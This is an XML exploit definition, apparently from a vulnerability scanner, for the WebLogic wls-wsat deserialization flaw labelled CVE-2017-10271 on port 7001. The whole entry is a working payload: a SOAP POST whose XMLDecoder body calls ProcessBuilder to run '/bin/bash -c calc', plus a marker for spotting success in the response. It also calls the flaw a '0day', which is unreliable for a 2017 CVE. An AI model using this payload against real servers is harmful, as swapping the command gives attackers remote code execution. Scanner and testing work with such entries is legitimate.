<zbz>1</zbz>
<bz1>
<name>Weblogic反序列化</name>
<sfjt>post</sfjt>
<dzkz>/wls-wsat/CoordinatorPortType</dzkz>
<demo><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
	<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
		<java version="1.8.0_131" class="java.beans.XMLDecoder">
		  <void class="java.lang.ProcessBuilder">
			<array class="java.lang.String" length="3">
			  <void index="0">
				<string>/bin/bash</string>
			  </void>
			  <void index="1">
				<string>-c</string>
			  </void>
			  <void index="2">
				<string>calc</string>
			  </void>
			</array>
		  <void method="start"/></void>
		</java>
	  </work:WorkContext>
	</soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope></demo>
<cl>Content-Type: text/xml</cl>
<expjc>1</expjc>
<zjyz></zjyz>
<xxxz>S:Server</xxxz>
</bz1>
<bz>Weblogic 0day

Weblogic反序列化漏洞

Port:7001

CVE-2017-10271</bz>